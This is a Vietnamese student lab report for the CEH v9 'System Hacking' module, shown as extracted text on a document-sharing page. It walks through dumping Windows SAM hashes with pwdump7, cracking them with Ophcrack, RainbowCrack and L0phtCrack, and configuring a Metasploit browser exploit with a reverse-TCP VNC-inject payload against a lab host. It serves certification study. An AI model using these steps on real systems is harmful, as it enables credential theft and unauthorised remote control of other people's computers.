1. Trang chủ
  2. » Luận Văn - Báo Cáo

Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9

53 180 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 53
Dung lượng 4,51 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9 Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9Tìm hiểu Thực hành Báo cáo SYSTEM HACKING CEH v9

Trang 1

SYSTEM HACKING

MODULE 05

Trang 2

GIỚI THIỆU

 Theo thống kê của công ty BKAV, từ đầu năm 2013 đến nay, tại Việt Nam đã có

2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng

có khoảng 300 website bị tấn công

 Hiện nay, các thiết bị như máy tính PC, laptop, đều có kết nối mạng nội bộ hoặc

kết nối Internet Trên các thiết bị này, hầu hết cài đặt các phần mềm ứng dụng

như IE, Microsoft Office, Adobe Reader, Và chạy hệ điều hành như Windows

XP, Windows 7,

Trang 3

Giới thiệu system hacking

Gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều hành windows

Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống

Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức

Trang 4

CÁC LỖ HỔNG THƯỜNG KHAI THÁC TRONG HỆ ĐIỀU HÀNH WINDOWS

1, Xuất hiện một lỗ hổng có thể bị khai thác bằng các công nghệ hiện

Trang 5

CÁC LỖ HỔNG THƯỜNG KHAI THÁC TRONG HỆ ĐIỀU HÀNH WINDOWS

5, Lỗ hổng được công bố ra ngoài

6, Các phần mềm Anti-virus được cập nhật thông tin để phát hiện khi có

các

Đoạn mã tìm cách khai thác lỗ hổng này

7, Hãng sản xuất hoàn thành bản vá

8, Hãng hoàn tất phát hành bản vá lỗi đến tất cả khách hàng

Trang 6

QUÁ TRÌNH TẤN CÔNG

VÀO MỘT HỆ THỐNG

Trích ra tất cả những thông tin có thể về user trong hệ thống Dùng các phương pháp thăm dò hữu ích

để có được thông tin hữu ích, chính xác

Bẻ khóa mật khẩu đăng nhập của user hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống

Chuyển đổi giới hạn truy cập từ user bình thường lên admin hoặc user có quyền cao hơn đủ cho chúng

Trang 7

QUÁ TRÌNH TẤN CÔNG

VÀO MỘT HỆ THỐNG

Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật thư Footprinting, Social engineering, Enumeration, Google Hacking đã được áp dụng cho mục đích truy tìm thông tin.

Trang 8

ĐÔI NÉT VỀ systems hacking

 Trong Modul Chúng tôi sẽ thực hiện các bài lab trong chủ đề Systems Hacking (Tấn công hệ

thống) Đây là một nghệ thuật để kiểm tra một máy tính và một hệ thống mạng máy tính nhằm

xác định các lỗ hổng và các điểm yếu bảo mật mà Attacker Hacker có thể tấn công và đột nhập

vào

 Một trong những chủ đề chính của Systems Hacking là tấn công về mật khẩu (Password Hacking)

có thể được xem là một trong những bước dễ và thông dụng nhất mà Attacker có thể đoạt được

quyền truy cập trái phép vào một máy tính hay mạng máy tính Mặc dù những mật khẩu mạnh rất

là khó có thể Crack (Bẻ khóa)

Trang 9

ĐÔI NÉT VỀ systems hacking

 Tuy nhiên đa số người dùng, ngay cả những chuyên gia bảo mật hay là những nhà quản trị hệ

thống và đương nhiên những người sử dụng cũng thường xuyên đặt mặt khẩu yếu

 Điều này làm cho những công cụ bẻ khóa mật khẩu có rất nhiều ngày này có thể dễ dàng phá

được mật khẩu Giúp cho Attacker thâm nhập vào một hệ thống.

Trang 10

 Và sau khi Hacker thâm nhập vào hệ thống thông qua mật khẩu đã được bẻ khóa thì các

hacker có thể cài cắm các chương trình đánh cắp dữ liệu, mở cổng hậu để có thể truy cập vào

các lần sau hoặc là sử dụng những máy tính bị tấn công làm bàn đạp để tấn công trên toàn hệ

thống mạng.

 Các chủ đề chính trong chương này là, chúng ta có thể biết được những cách giám sát từ xa

hoặc là che dấu các tập tin, trích xuất những tập tin được che dấu, giám sát hệ thống từ xa,…

mà chúng ta cần qua

  Mục tiêu của Systems Hacking đó là:

 Đoạt được quyền truy cập

 Leo thang đặc quyền

 Thực thi ứng dụng

 Che dấu hành động, file thông qua việc xóa các dấu vết.

ĐÔI NÉT VỀ systems hacking

Trang 11

Bài 1 Dumping and Cracking SAM Hashes to Extract Plaintext

Passwords

Trang 12

Trích xuất hash mật khẩu

hệ thống bằng pwdump7

 Pwdump7 có thể được sử dụng để hủy bỏ các tệp được bảo vệ Bạn có

thể luôn luôn sao chép một tập tin được sử dụng bằng cách thực hiện

pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat Ophcrack là

một chương trình miễn phí mã nguồn mở (GPL) làm nứt Windows

password bằng cách sử dụng LM hashes thông qua các bảng cầu vồng.

Trang 13

Các bước thực hiện

1, Mở cmd với quyền Admin và truy xuất tới thư mục pwdump7

trong ổ C bằng câu lệnh: cd c:\pwdump7

Trang 14

Các bước thực hiện

2, - Chạy dòng lệnh pwdump7 để xuất hiện các mật khẩu bị mã hóa

- Trích xuất hash password của các tài khoản trong Victim và lưu vào file hashes.txt ở ổ C bằng câu lệnh: pwdump7 > c:\hashes.txt

Trang 15

Bẻ khóa mật khẩu bằng

Ophcrack tool

 Chương trình bao gồm kOphcrack là một chương trình mã nguồn

mở miễn phí (GPL licensing) bẻ khóa mật khẩu đăng nhập Windows

bằng cách sử dụng LM hashes (hàm băm) qua Rainbow Talbe.

 Khả năng nhập các hashes từ nhiều định dạng, bao gồm

dumping trực tiếp từ các tệp SAM của Windows. Trên hầu hết

các máy tính, Ophcrack có thể crack hầu hết các mật khẩu trong

vòng vài phút.

 Rainbow tables là một bảng được tính trước để đảo ngược các

(hashes) hàm băm mật mã, thường là để bẻ mật khẩu Các bảng

thường được sử dụng để khôi phục mật khẩu,… lên đến một

chiều dài nhất định bao gồm bộ ký tự giới hạn

Trang 16

CÁC BƯỚC THỰC HIỆN

1, Cài đặt Ophcrack

Trang 17

CÁC BƯỚC THỰC HIỆN

2, - Chọn Load menu và chọn PWDUMP

- Tiếp theo ta sẽ chọn file Hashes.txt mà ta đã trích xuất trong ổ C bằng PWDUMP7 tool

Sau khi click OK ta được

Trang 18

CÁC BƯỚC THỰC HIỆN

3, Click vào tables, tìm và chọn Vista free

Sau khi click Install ta được

- Chọn đường dẫn đến folder: Tables_vista_free

- Sau đó click Select Folder và chọn OK.

Lúc này Vista free đã hiển thị (on disk)

Trang 19

CÁC BƯỚC THỰC HIỆN

4, Click chọn Crack để tiến hành bẻ khóa mật khẩu và ta thu được kết quả

Trang 20

Bài 2 Creating and Using the Rainbow Tables

Trang 21

Giới thiệu

 Trong phần này chúng ta sẽ sử dụng những công cụ để tạo ra một cơ sở dữ liệu gồm có giá trị

hash value và dùng nó để so khớp với những thông tin của các giá trị hack value mà chúng ta

thu thập về.

 Nếu như tập hợp cơ sở dữ liệu của các giá trị mà chúng ta có đủ để chúng ta tìm ra được những

thông tin trùng khớp thì lúc đó chúng ta sẽ crack được mật khẩu.

 Trong bài thực hành này chúng ta sẽ tạo ra những cơ sở dữ liệu vừa đủ Vì muốn tạo ra CSDL

lớn thì phải đòi hỏi thời gian rất là lâu và trong một giới hạn của một bài tập thì không cho

phép Mật khẩu dùng crack cũng khá đơn giản vì dung để minh họa quá trình hoạt động của

công cụ và ứng dụng Còn trong những trường hợp mật khẩu phức tạp hơn thì đòi hỏi các bạn

phải tạo ra những CSDL mạnh mẽ hơn.

Trang 22

 Bây giờ chúng ta sẽ tạo một Rainbow Tables (một tập CSDL) để có thể sử dụng nó để crack những mật khẩu.

Chương trình chúng ta chạy trong bài lab này là: Winrtgen

 Công cụ này có thể download từ trang: http://www.oxid.it/projects.html

Sử dụng trên nền Windows Server 2012

Trang 23

Các bước thực hiện

1, - Mở folder CEHv9 Module 05 System Hacking, chọn đường dẫn đến folder Winrtgen

- Double click vào chương trình winrtgen ta được như sau:

Trang 24

Các bước thực hiện

2, Click chọn Add tables ta được:

Trang 25

Các bước thực hiện

2, Click chọn Add tables ta được:

- HASH: Password chúng ta định bẻ khóa nó sử dụng thuật toán nào

thì chúng ta sử dụng Hash value tương ứng

- Min Len, Max Len: Ký tự password

- Chain Count: Giá trị

- N* of tables (Number of tables): bảng

- Charset: những ký tự của mật khẩu Tùy thuộc vào mật khẩu là dạng gì (số or chữ,…)

Trang 26

Các bước thực hiện

3, Sau khi thiết lập xong thì click OK để xem quá trình khởi tạo

Sau khi click Start Tiến trình sẽ chạy và cho ra kết quả như hình

Trang 27

Các bước thực hiện

- Tập tin chúng ta vừa tạo nó sẽ được lưu cùng với folder Winrtgen

Trang 28

Các bước thực hiện

4, - Mở folder CEHv9 Module 05 System Hacking , chọn đường dẫn đến folder RainbowCrack

- Double click vào chương trình rcrack_gui ta được như sau:

Trang 29

Các bước thực hiện

5, - Mở file Hasht.txt mà chúng ta có thể trích xuất được từ PWDUMP7

- Tiến hành copy đoạn mã

Trang 30

Các bước thực hiện

6, - Tiến hành copy đoạn mã add vào RainbowCrack

Trang 31

Các bước thực hiện

7, - Click thanh công cụ Rainbow Table chọn Serch Rainbow Tables

- Sau đó ta lựa chọn đường dẫn tới tập tin được khởi tạo bởi winrtgen và click OK

 Cuối cùng ta nhận được kết quả là Password của người quản trị:

Trang 32

Bài 3 AUDITING SYSTEM PASSWORDS USING L0PHTCRACK

Trang 33

Giới thiệu

 Vì tính an toàn và tuân thủ là những ưu tiên cao đối với hầu hết các tổ chức, các cuộc tấn

công vào hệ thống máy tính của công ty hoặc tổ chức có nhiều hình thức khác nhau, chẳng

hạn như spooling, smurfing, và các loại tấn công DoS (demal-of-service) khác Những cuộc

tấn công này được thiết kế để gây hại hoặc gián đoạn việc sử dụng các hoạt động của bạn hệ

thống hơn.

 Password cracking là một thuật ngữ được sử dụng để mô tả sự xâm nhập của một mạng lưới,

hệ thống hoặc tài nguyên bằng việc sử dụng công cụ để mở khóa một tài nguyên đã được

bảo vệ bằng password.

 Trong bài lab này, chúng ta sẽ giải đáp:

1 Password cracking là gì?

2 Tại sao kẻ tấn công làm điều đó?

3 Làm thế nào để họ đạt được mục tiêu của họ?

4 Bạn có thể làm gì để tự bảo vệ mình?

 Thông qua kiểm tra một vài kịch bản Trong bài lab này, chúng tôi mô tả một số kỹ thuật mà

các attacker triển khai và một vài công cụ trợ giúp trong các cuộc tấn công của họ.

Trang 34

Các bước thực hiện

1, Cài đặt và kkhởi động L0phtCrack Click Next.

2, Choose Retrieve from a machine in the menu , and click Next

Trang 35

Các bước thực hiện

3, Choose Strong Password Audit in the menu, and click Next

4, In the Pick Reporting Stylel , check all the options, and click Next

5, Click the Finish

Trang 36

Các bước thực hiện

6, Click Add

7, Nhập địa chỉ IP của Win server 2008 vào ô Machine , click OK

! Kiểm tra IP bằng cách dùng CMD, nhập lệnh: ipconfig

Trang 37

Các bước thực hiện

8, Choose Use specific credentials for this machine Sau đó tiến hành nhập thông tin người dùng Enter Domain với CEH.com, and click OK

9, Tiếp tục click OK để chương trình chạy

 Ta thu được kết quả

Trang 38

Exploiting Client-Side Vulnerabilities and Establishing 

a VNC Session

Trang 39

Giới thiệu

- VNC (Virtual Network Computing) là một công nghệ kĩ thuật dung để chia sẻ giao diện màn hình từ xa

(remote desktop sharing) VNC giúp người dung hiển thị được màn hình của máy tính hoặc hệ thống ở

xa ngay trên màn hình máy tính local của người dung và có thể điều khiển thao tác qua kết nối mạng

Đồng nghĩa với việc đó, VNC cho phép kẻ tấn công truy cập từ xa và kiểm soát máy tính được nhắm

mục tiêu từ một máy tính hoặc thiết bị di động khác, bất kể họ ở đâu trên thế giới

- Ở đây, chúng ta sẽ thấy những kẻ tấn công có thể khai thác lỗ hổng trong các hệ thống mục tiêu như

thế nào để thiết lập các VNC trái phép và điều khiển các mục tiêu này từ xa

Trang 40

Mục tiêu bài lab

Mục tiêu của phòng thí nghiệm này là giúp chúng ta học

được cách khai thác các lỗ hổng ở máy đích và thiết lập một

kết nối VNC

 Metasploit là một dự án bảo mật máy tính cung cấp các

thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về

kiểm tra thâm nhập và phát triển hệ thống phát hiện tấn

công mạng.

 Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux,

Windows, MacOS

Trang 41

Các bước thực hiện

1, Mở terminal trong Linux và chạy dòng lệnh: msfconsole để chạy Metasploit

Trang 43

Các bước thực hiện

3, Gõ lệnh : use exploit/windows/browser/ms11_003_ie_css_import and press Enter

Trang 44

Các bước thực hiện

4, Gõ lệnh: set payload windows/vncinjec/resverse_tcp and press Enter

Trang 45

Các bước thực hiện

4, Gõ lệnh: show options and press Enter

=> Để kiểm tra các tùy chọn có sẵn trong khai thác này

Trang 46

Các bước thực hiện

5, Như trong ảnh ta có thể thấy LHOST không được set và LPORT được mặc định là port number Bây giờ chúng ta cần set LHOST và LPORT

Trang 47

Các bước thực hiện

4, Setting LHOST and LPORT

- Type set: LHOST [attacker machine IP address] and press Enter

+ Trong bài lab, địa chỉ IP của Kali Linux machine là: 192.168.0.126

Trang 48

Các bước thực hiện

4, Setting LHOST and LPORT

- To set local port, type: set LPORT 443 and presses Enter

- To set LHOST, type: set LHOST 192.168.0.126

Trang 49

Các bước thực hiện

Tiến hành kiểm tra việc thiết đặt, type : show options

Trang 50

Các bước thực hiện

5, Running Exploit

- Type: exploit and press Enter để chạy exploit

Ngày đăng: 29/10/2019, 09:17

TỪ KHÓA LIÊN QUAN

w